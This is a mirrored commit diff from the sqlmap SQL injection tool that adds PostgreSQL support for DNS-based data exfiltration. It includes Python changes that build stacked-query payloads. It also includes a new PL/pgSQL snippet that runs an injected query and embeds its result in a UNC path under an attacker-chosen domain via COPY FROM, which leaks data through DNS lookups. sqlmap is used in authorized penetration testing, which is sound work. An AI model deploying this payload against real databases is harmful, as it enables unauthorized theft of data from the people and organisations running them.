mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-01-24 08:14:24 +03:00
adding support for PgSQL DNS data exfiltration
This commit is contained in:
parent
b2afa87e48
commit
8c6eb4faa9
|
@ -805,7 +805,7 @@ class Agent:
|
|||
retVal = None
|
||||
|
||||
if inpStr:
|
||||
match = re.search("%s(?P<result>.*?)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), inpStr)
|
||||
match = re.search("%s(?P<result>.*?)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), inpStr, re.S)
|
||||
|
||||
if match:
|
||||
retVal = match.group("result")
|
||||
|
|
|
@ -1609,11 +1609,17 @@ def getSPQLSnippet(dbms, name, **variables):
|
|||
retVal = readCachedFileContent(filename)
|
||||
|
||||
retVal = re.sub(r"#.+", "", retVal)
|
||||
retVal = re.sub(r"(?s);\W+", "; ", retVal).strip()
|
||||
retVal = re.sub(r"(?s);\s+", "; ", retVal).strip()
|
||||
|
||||
for _ in variables.keys():
|
||||
retVal = re.sub(r"%%%s%%" % _, variables[_], retVal)
|
||||
|
||||
for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I):
|
||||
retVal = retVal.replace(_, randomStr())
|
||||
|
||||
for _ in re.findall(r"%RANDINT\d+%", retVal, re.I):
|
||||
retVal = retVal.replace(_, randomInt())
|
||||
|
||||
_ = re.search(r"%(\w+)%", retVal, re.I)
|
||||
if _:
|
||||
errMsg = "unresolved variable '%s' in SPL snippet '%s'" % (_.group(1), name)
|
||||
|
|
|
@ -15,6 +15,7 @@ import urllib2
|
|||
import urlparse
|
||||
import traceback
|
||||
|
||||
from extra.safe2bin.safe2bin import safecharencode
|
||||
from extra.socks.socks import ProxyError
|
||||
from extra.multipart import multipartpost
|
||||
|
||||
|
@ -549,7 +550,7 @@ class Connect:
|
|||
|
||||
value = agent.replacePayload(value, payload)
|
||||
|
||||
logger.log(CUSTOM_LOGGING.PAYLOAD, payload)
|
||||
logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload))
|
||||
|
||||
if place == PLACE.COOKIE and conf.cookieUrlencode:
|
||||
value = agent.removePayloadDelimiters(value)
|
||||
|
|
|
@ -48,7 +48,7 @@ def dnsUse(payload, expression):
|
|||
count = 0
|
||||
offset = 1
|
||||
|
||||
if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL):
|
||||
if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):
|
||||
output = hashDBRetrieve(expression, checkConf=True)
|
||||
|
||||
if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:
|
||||
|
@ -60,7 +60,7 @@ def dnsUse(payload, expression):
|
|||
while True:
|
||||
count += 1
|
||||
prefix, suffix = ("%s" % randomStr(3) for _ in xrange(2))
|
||||
chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL) else MAX_DNS_LABEL / 4 - 2
|
||||
chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2
|
||||
_, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
|
||||
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
||||
nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
|
||||
|
@ -70,14 +70,14 @@ def dnsUse(payload, expression):
|
|||
expressionRequest = getSPQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain)
|
||||
expressionUnescaped = unescaper.unescape(expressionRequest)
|
||||
|
||||
if Backend.isDbms(DBMS.MSSQL):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
|
||||
comment = queries[Backend.getIdentifiedDbms()].comment.query
|
||||
query = agent.prefixQuery("; %s" % expressionUnescaped)
|
||||
query = agent.suffixQuery("%s;%s" % (query, comment))
|
||||
forgedPayload = agent.payload(newValue=query)
|
||||
else:
|
||||
forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
|
||||
|
||||
|
||||
Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)
|
||||
|
||||
_ = conf.dnsServer.pop(prefix, suffix)
|
||||
|
|
13
procs/postgresql/dns_request.txt
Normal file
13
procs/postgresql/dns_request.txt
Normal file
|
@ -0,0 +1,13 @@
|
|||
DROP TABLE IF EXISTS %RANDSTR1%;
|
||||
CREATE TABLE %RANDSTR1%(%RANDSTR2% text);
|
||||
CREATE OR REPLACE FUNCTION %RANDSTR3%()
|
||||
RETURNS VOID AS $$
|
||||
DECLARE %RANDSTR4% TEXT;
|
||||
DECLARE %RANDSTR5% TEXT;
|
||||
BEGIN
|
||||
SELECT INTO %RANDSTR5% (%QUERY%);
|
||||
%RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\'';
|
||||
EXECUTE %RANDSTR4%;
|
||||
END;
|
||||
$$ LANGUAGE plpgsql SECURITY DEFINER;
|
||||
SELECT %RANDSTR3%();
|
Loading…
Reference in New Issue
Block a user